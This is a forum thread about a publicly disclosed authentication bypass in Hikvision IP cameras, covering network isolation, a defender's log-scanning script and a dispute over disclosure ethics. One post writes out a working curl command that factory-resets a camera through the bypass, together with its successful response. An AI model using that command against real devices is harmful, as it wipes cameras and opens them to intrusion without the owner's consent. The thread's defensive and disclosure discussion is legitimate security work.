Backdoor found in Hikvision cameras

Geez. I found this thread via a thread about the Hikvision cube clone (which I just bought a month ago).

I have Ubiquiti Unifi gear. The BI PC is on VLAN2 with no access to my main LAN. My IP camera group on VLAN2 is blocked from accessing the WAN and my main LAN (it cannot ping out to the WAN or to LAN1). The cameras get their time from my BI PC using the nettime app. The BI PC only runs my cameras.

Does this sound safe? I have not touched the firmware on my 8 cameras in a while.

That's why you went to all of that trouble. You can't trust any of these cams. Or many other devices either for that matter.
 
They are not... they either have to put a bit of effort into learning how (as you have shown, it's not that difficult) or hire someone... those same folks wouldn't dare run electrical wiring themselves... so they should hire someone for this as well.
And sadly plenty of the people you can hire are a bit clueless when it comes to security.
 

We have a client that is the absolute opposite. Palo Alto Next Generation firewalls at every facility. They really aren't very worried about holes in NVRs or cams.

All remote access is done via VPN, no ports. And the firewall is on top of any strange traffic immediately. Palo Alto stuff is NOT cheap. But when properly configured, it adds a HUGE layer of security to cams and other IoT stuff that very few are employing.

Honestly, this client has taught us a LOT.
 
Fancy firewalls are great at breaking legitimate apps whenever they do anything more than a plain, cheap NAT router would. But they do have their place.
 
Details published yesterday in the full disclosure mailing list. Peeping toms and botnet herders are probably celebrating.

Thanks for publishing this. I looked at your findings and tested them against an unpatched Hikvision system I had on hand. You mentioned that "all other HikCGI calls" are vulnerable to the auth bypass but did you actually test ones like the factoryReset one? From what I can see only the ones that are normally called by GET appear vulnerable and the rest (PUT ones like factoryReset) still come out as 401 Unauthorized. Perhaps I missed something? Nice find either way!
 

That is indeed working on my IPC DS-2CD2020F.

$ curl -X PUT -v http://192.168.5.20/System/factoryDefault?auth=YWRtaW46MTEK
* Hostname was NOT found in DNS cache
* Trying 192.168.5.20...
* Connected to 192.168.5.20 (192.168.5.20) port 80 (#0)
> PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.5.20
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 17 Sep 2017 11:31:01 GMT
* Server App-webs/ is not blacklisted
< Server: App-webs/
< Connection: close
< Content-Length: 257
< Content-Type: application/xml
<
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="Oops:The page you are visiting may have been deleted,renamed or inaccessible.">
<requestURL>/System/factoryDefault</requestURL>
<statusCode>7</statusCode>
<statusString>Reboot Required</statusString>
</ResponseStatus>
* Closing connection 0
$
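As an added defender-side example (not code from the thread, from Montecrypto, or from Hikvision), here is a small log scanner that flags HTTP requests carrying the base64 `auth=` query parameter discussed above and escalates the PUT to /System/factoryDefault as destructive; the sample log lines, the combined-log regex and the DESTRUCTIVE path set are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format, as a reverse proxy or
# the camera's own web log might record them; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2017:11:31:01 +0000] "PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1" 200 257 "-" "curl/7.38.0"
10.0.0.7 - - [17/Sep/2017:11:32:10 +0000] "GET /Streaming/channels/1/picture?auth=YWRtaW46MTEK HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Sep/2017:11:33:00 +0000] "GET /System/configurationData HTTP/1.1" 401 0 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Sep/2017:11:33:05 +0000] "GET /ISAPI/System/status?auth=notbase64!! HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed set of CGI paths whose success means loss of the device; extend as needed.
DESTRUCTIVE = {"/System/factoryDefault", "/System/reboot"}


def decode_auth_param(value):
    """Return (user, password) if value is base64 of 'user:password', else None."""
    try:
        raw = base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = raw.strip().partition(":")
    return (user, password) if sep else None


def scan_log(text):
    """Flag every request whose query string carries a decodable auth= credential."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; ignore
        parts = urlsplit(m["target"])
        for v in parse_qs(parts.query).get("auth", []):
            creds = decode_auth_param(v)
            if creds is None:
                continue  # garbage value, not the bypass pattern
            severity = "critical" if parts.path in DESTRUCTIVE else "high"
            findings.append({"src": m["src"], "method": m["method"], "path": parts.path,
                             "user": creds[0], "status": int(m["status"]),
                             "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A 200 response on a flagged line means the bypass succeeded against that device, while a 401 on the same path shows the patched firmware (or a non-vulnerable call) rejecting it.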
 
I guess my cameras are not affected (DS-2CD3132-I).

But if my NVR with POE ports built into it has a different LAN for the cameras (e.g. 192.168.254.13) from my main network (e.g. 192.168.1.1; only my NVR connects to this network and it doesn't support virtual hosting for cameras), which is connected to the internet, do I have to worry about anything?

The only way I can reach my camera web GUI is by connecting to a free POE port on the NVR and changing my PC's LAN settings to match the NVR LAN.

Thanks.
 
You are assuming that the NVR does not have any vulnerabilities... it likely has many...
 

Oh, I'm sure it has vulnerabilities. People just haven't found them yet and made them public. When electronics come here on the slow boat from China I always suspect some kind of manufacturer backdoor.

In the future I'll probably be doing a BI or Milestone build. Or upgrade my HTPC with dual Xeon and run it on that.
 
You should run any VMs on a dedicated PC....
 
Montecrypto - why the hell did you publish this? I knew about this 2 years ago but knew that publishing it would make things worse.
To be honest - we are both "rev engs" but disclosing this kind of info to the public will screw a lot of hardware and create a lot of chaos.
Even on this board. Are you happy? I'm not.
Btw. there is also a heap overflow - it will be fixed soon but I will not disclose it as you do. Sorry.
A job is a job, fun is fun, but this is insane.
 
If you knew about this 2 years ago then why did it take Hikvision until January 2017 (about 9 months ago) to publish firmware with it fixed?

Disclosing vulnerabilities like this is standard practice, to get manufacturers and software vendors to take threats seriously, among other reasons.
 
2 years is a little too big - time is running.
You don't understand HOW EASY it is to use it via the Shodan.io platform by script-kiddies just for fun now.
This bug will not hit HUGE CCTV closed systems but poor people who want to have a view of their homes.
And no, this is not the good way of pushing manufacturers to treat you seriously.
I don't have this kind of problem with HikVision NOR Dahua.
 
He was forced to disclose it to get Hikvision to take action.... even if we believe your story that you knew about this vulnerability, do you think you two were the only ones? The public has a right to know....
 
What? Hikvision CREATED an upgrade to their FW, right? So why DID HE HAVE TO?
Nevermind - you don't have a clue about my story.
I always published info that won't hurt anybody on this board.
The public has a right to know THAT A MERCEDES CAN BE STOLEN BY A KID, not INSTRUCTIONS ON TV ON HOW TO STEAL A MERCEDES CAR that even a KID can use. That's the difference.
Ok, nevermind....
 
Wrong... this kind of stuff will force manufacturers to take security seriously... they will get a shitload of complaints... from dealers, end users, bad publicity...
Let me ask you this, please show me where Hikvision has notified dealers and end users of this exploit; it's missing from their press release pages...
 